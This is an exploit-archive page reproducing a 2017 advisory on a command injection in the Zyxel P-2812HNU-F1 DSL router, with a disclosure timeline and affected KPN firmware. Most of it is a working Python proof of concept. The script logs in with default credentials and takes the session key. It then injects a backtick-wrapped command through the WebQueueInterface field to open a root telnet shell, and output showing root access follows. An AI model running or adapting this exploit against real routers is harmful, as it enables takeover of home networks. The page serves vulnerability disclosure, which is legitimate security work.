Exploit the possiblities

Zyxel P-2812HNU-F1 DSL Router Command Injection

Zyxel P-2812HNU-F1 DSL Router Command Injection
Posted Sep 29, 2017
Authored by Willem de Groot

The Zyxel P-2812HNU-F1 DSL router suffers from a remote command injection vulnerability. Firmware versions V3.11TUE3 (KPN) and V3.11TUE8 (KPN) are affected.

tags | exploit, remote
MD5 | 4e96266347da2978416374bfccea7eb7

Zyxel P-2812HNU-F1 DSL Router Command Injection

Change Mirror Download
Zyxel P-2812HNU-F1 DSL router - command injection
=================================================
The Zyxel P-2812 is common in the Netherlands (KPN/Telfort) and Norway
(Telenor). The Dutch firmware is susceptible to authenticated command
injection
through `qos_queue_add.cgi` and the `WebQueueInterface` parameter.

Affected firmware versions
==========================
V3.11TUE3 (KPN)
V3.11TUE8 (KPN)

Not affected
============
BLN.18 and up (Telenor)

Disclosure timeline
===================
2017-02-05 Notified cert@kpn-cert.nl
2017-02-11 Notified cert@telenor.net
2017-02-15 KPN: "escalated to Zyxel"
2017-02-23 Telenor: "we have fixed this previously in BLN18"
2017-09-28 Public disclosure

Proof of concept code
=====================
Sample code at
http://gwillem.gitlab.io/2017/09/28/hacking-the-zyxel-p-2812hnu-f1/

#!/usr/bin/env python3
# 2017-02-03 gwillem@gmail.com

import requests
import re

USER = 'user'
PASS = '1234'
URL = 'http://192.168.1.254/'
CMD = '/sbin/telnetd -l/bin/sh -p9999 &'

s = requests.Session()
s.post(URL + 'login.cgi', data=dict(
UserName=USER,
password=PASS,
hiddenPassword=PASS,
submitValue='1'))
r = s.get(URL + 'fileuser_mod.cgi')
assert 'sessionKey' in r.text, r.text

sessionkey = re.search("gblsessionKey = '(.+?)'", r.text).group(1)
assert len(sessionkey) > 24, sessionkey

r = s.post(URL + 'qos_queue_add.cgi', data=dict(
Submit='Apply',
QueueObjectIndex='15',
QueueNameTxt='test',
WebQueueInterface='WAN`%s`' % CMD,
WebQueuePriority='1',
WebQueueWeight='1',
sessionKey=sessionkey,
))

if "window.parent.document.activePage('network-qos',1)" in r.text:
print("Success, root shell at port 9999")
else:
print("Did not work, see output:\n" + r.text)

Working?

$ ./open-sesame.py
Success!
$ telnet 192.168.1.1 9999
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
# id
uid=0(root) gid=0(root)



Observations
============
Security fixes for branded Zyxel firmware are not necessarily implemented
by all OEM clients.


--
Willem de Groot
https://twitter.com/gwillem
https://gwillem.gitlab.io

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    10 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close